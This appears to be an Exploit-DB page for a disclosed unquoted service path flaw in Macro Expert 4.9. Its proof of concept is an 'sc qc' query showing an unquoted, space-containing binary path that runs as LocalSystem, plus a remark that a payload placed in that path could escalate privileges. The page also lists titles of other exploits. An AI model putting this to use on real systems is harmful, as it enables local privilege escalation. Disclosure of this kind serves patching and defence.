ccfd0c515d
3 changes to exploits/shellcodes/ghdb Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) Macro Expert 4.9 - Unquoted Service Path
25 lines
No EOL
946 B
Text
25 lines
No EOL
946 B
Text
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
|
|
# Date: 04/06/2023
|
|
# Exploit Author: Murat DEMIRCI
|
|
# Vendor Homepage: http://www.macro-expert.com/
|
|
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
|
|
# Version: 4.9
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept :
|
|
|
|
C:\Users\Murat>sc qc "Macro Expert"
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: Macro Expert
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Macro Expert
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts. |